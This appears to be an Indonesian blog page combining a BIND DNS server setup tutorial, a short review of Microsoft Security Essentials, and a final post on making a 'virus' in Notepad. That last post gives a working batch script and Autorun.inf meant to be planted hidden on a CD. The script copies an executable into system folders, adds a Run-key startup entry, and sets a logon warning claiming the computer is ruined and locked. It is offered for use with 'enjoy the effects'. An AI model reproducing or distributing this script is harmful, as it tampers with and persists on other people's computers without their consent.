// query-source address * port 53;
};
//
// a caching only nameserver config
//
zone "." IN {
type hint;
file "named.root";
};
zone "slacker.org" IN {
type master;
file "slackware.zone";
allow-update { none; };
};
zone "0.168.192.in-addr.arpa" IN {
type master;
file "192.168.0.zone";
allow-update { none; };
};
----------------------------------------------------------------
kita perhatikan baris
zone "slacker.org" IN {
Ini kita sesuaikan dengan nama domain yang kita buat. Jika kita membuat domain cumicumi.com maka baris zone itu juga berisi ?cumicumi.com?, selanjutnya adalah jenis dari domain tersebut apakah merupakan domain master atau slave, untuk lebih detil tentang master dan slave dari domain silahkan baca dokumentasi tentang dns.
Baris berikut adalah file dari domain. File bisa kita namakan terserah kita namun yang pasti sama dengan yang ada pada blok zone, dalam hal ini kita menggunakan nama file ?slacker.zone?, mas kenthir sarankan nama file yang digunakan representatif sehingga untuk administrasi ataupun trouble shooting tidak lagi pusing soal nama file dan domain.
Blok terakhir yang kita buat adalah reverse dari domain slacker.org, berhubung karena kita dalam tahap belajar maka kita menggunakan ip address lokal saja, dalam hal ini kita defenisikan adalah 192.168.0.X, yang perlu diperhatikan pada pendefenisian reverse, penulisan alamat ip itu ditulis terbalik (namanya juga reverse) jadi jika kita menggunakan ip 192.168.0.X maka yang
dituliskan di zone reverse adalah ?0.168.192.in-addr.arpa?, demikian juga halnya jika menggunakan ip - ip yang lain atau ip publik.
Baris selanjutnya sama dengan forward dari slacker.org yaitu type domain dan file zone, dalam hal ini kita menset 192.168.0.zone untuk file dari reverse kita.
----------------------------------------------------------------
+++FILE-FILE ZONE+++
setelah file "named.conf" kita oprek, kita akan oprek file "slacker.zone" dan "192.168.0.zone"
root@slacker:/var/named# ls -l
total 24
-rw-r--r-- 1 root root 281 2009-02-19 21:36 192.168.0.zone
drwxr-xr-x 2 root root 4096 2008-04-14 05:07 caching-example/
-rw-r--r-- 1 root root 195 2009-02-11 09:23 localhost.zone
-rw-r--r-- 1 root root 433 2009-02-11 09:23 named.local
-rw-r--r-- 1 root root 2878 2009-02-11 09:23 named.root
-rw-r--r-- 1 root root 289 2009-02-19 21:38 slacker.zone
lalu pada file "slacker.zone" ganti kata localhost dengan kata slacker.org seperti di bawah ini;
$TTL 86400
$ORIGIN slacker.org. # domain yang akan kita buat
@ 1D IN SOA @ root (
42 ; serial (d. adams)
3H ; refresh
15M ; retry
1W ; expiry
1D ) ; minimum
1D IN NS ns1.slacker.org. # sebagai NS server dari domain
1D IN A 192.168.0.6 # ip dari komputer Byang menjalankan webserver
ns1 1D IN CNAME @
www 1D IN CNAME @ # Baris pertama merupakan subdomain www yang menunjuk pada A record
uname 1D IN A 192.168.0.16 # kita buat sub domain dengan nama "uname" yang menunjuk komputer A
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
setelah itu kita acak-acak file "192.168.0.zone" (reverse) seperti di bawah ini;
$TTL 86400
@ IN SOA slacker.org. root.slacker.org. (
1997022700 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
IN NS slacker.org.
6 IN PTR slacker.org.
16 IN PTR uname.slacker.org.
Seperti halnya reverse dari localhost kita juga hanya mengisikan ip dari daftar domain dan sub
domain yang kita buat.
Jika sudah selesai, silahkan merestart bind :
# /etc/rc.d/rc.bind restart
Jika tidak ada kesalahan (sebaiknya periksa /var/log/message) maka kita sudah bisa mengquery
domain yang kita buat.
Selanjutnya adalah menggunakan DNS Server kita, bagi pengguna linux silahkan edit file "/etc/resolv.conf" untuk memasukkan ip dari DNS Server, yaitu komputer A dengan ip 192.168.0.16
$ vi /etc/resolv.conf
search slacker.org
nameserver 192.168.0.16
Dengan demikian setiap kali ada permintaan DNS dari linux box kita maka akan menggunkan DNS dari 192.168.0.16, Silahkan sesuaikan dengan sistem atau distro linux yang lainnya..
Intip Fitur Antivirus Gratis, Microsoft Security Essentials
Seperti yang diberitakan beberapa waktu lalu, Microsoft akhirnya benar merilis software Microsoft Security Essentials versi beta di tanggal 23 Juni. Software Microsoft Security Essentials ini merupakan aplikasi antivirus gratis untuk pengguna Windows XP, Vista atau 7. Aplikasi baru ini akan menggantikan fungsi Windows Live OneCare yang ditujukan untuk meng-cover kebutuhan keamanan dan interface yang mudah digunakan untuk melakukan task apapun.
Sangat mudah memulai aplikasi software Microsoft Security Essentials ini. Ketika software ini di-launching untuk pertama kali, maka program akan men-download dan menginstal definisi virus yang paling up-to-date dan kemudian men-scan system komputer user. Sekali diinstal, software Microsoft Security Essentials ini akan secara otomatis men-download definisi virus yang baru per harinya via Windows Update. Interface Microsoft Security Essentials ini memiliki desain yang jernih dan jelas.
Di bagian atas jendela software Microsoft Security Essentials ini akan tampak status proteksi di komputer, protected atau unprotected. Semua fitur lainnya akan tampil dalam 4 tab, Home (yang tertampil di overview setting), Update (untuk update manual definisi virus), History (berisi log semua malware yang telah dibersihkan dari system), Setting (self-explanatory). Tab Setting memiliki beberapa fitur yang dienkripsi, seperti ‘Default actions’, yang merupakan default ‘Microsoft Security Essentials recommended action’, namun tidak mengidentifikasikan action yang dimaksud, dan user harus mencari di bagian help system untuk solusinya.
Software Microsoft Security Essentials ini dinilai Microsoft merupakan aplikasi antivirus yang user-friendly yang cocok untuk semua user termasuk deteksi malware dan update definisi virus secara manual.
Cara Membuat dari notepad
mas kenthir dapet ini dari hasil baca-baca “HELP”-nya windows Xp…trus coba dimodif sendiri…
note: “HANYA BEKERJA PADA WINDOWS XP”
caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… Laughing ) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
Langganan:
Postingan (Atom)
